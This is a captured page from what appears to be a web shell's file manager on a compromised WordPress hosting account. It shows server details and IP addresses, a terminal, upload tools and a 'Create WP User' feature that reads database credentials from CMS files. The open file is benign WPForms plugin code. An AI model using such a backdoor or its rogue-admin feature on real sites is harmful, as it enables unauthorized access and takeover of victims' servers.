Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.216.193
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
www
/
wordpress
/
wpn_budomat
/
wp-content
/
plugins
/
wpforms-lite
/
src
/
Providers
/
Provider
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
Settings
[目录]
drwxr-xr-x
2021-02-23 18:44
Core.php
3.22 KB
-rw-r--r--
2021-04-01 19:46
Process.php
2.19 KB
-rw-r--r--
2021-04-01 19:46
Status.php
2.78 KB
-rw-r--r--
2021-04-01 19:46
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
Process.php
<?php namespace WPForms\Providers\Provider; /** * Class Process handles entries processing using the provider settings and configuration. * * @since 1.4.7 */ abstract class Process { /** * Get the Core loader class of a provider. * * @since 1.4.7 * * @var Core */ protected $core; /** * Array of form fields. * * @since 1.4.7 * * @var array */ protected $fields = array(); /** * Submitted form content. * * @since 1.4.7 * * @var array */ protected $entry = array(); /** * Form data and settings. * * @since 1.4.7 * * @var array */ protected $form_data = array(); /** * ID of a saved entry. * * @since 1.4.7 * * @var int */ protected $entry_id; /** * Process constructor. * * @since 1.4.7 * * @param Core $core Provider core class. */ public function __construct( Core $core ) { $this->core = $core; } /** * Receive all wpforms_process_complete params and do the actual processing. * * @since 1.4.7 * * @param array $fields Array of form fields. * @param array $entry Submitted form content. * @param array $form_data Form data and settings. * @param int $entry_id ID of a saved entry. */ abstract public function process( $fields, $entry, $form_data, $entry_id ); /** * Process conditional logic for a connection. * * @since 1.4.7 * * @param array $fields Array of form fields. * @param array $form_data Form data and settings. * @param array $connection All connection data. * * @return bool */ protected function process_conditionals( $fields, $form_data, $connection ) { if ( empty( $connection['conditional_logic'] ) || empty( $connection['conditionals'] ) ) { return true; } $process = wpforms_conditional_logic()->process( $fields, $form_data, $connection['conditionals'] ); if ( ! empty( $connection['conditional_type'] ) && 'stop' === $connection['conditional_type'] ) { $process = ! $process; } return $process; } /** * Get provider options, saved on Settings > Integrations page. * * @since 1.4.7 * * @return array */ protected function get_options() { return \wpforms_get_providers_options( $this->core->slug ); } }
关闭
保存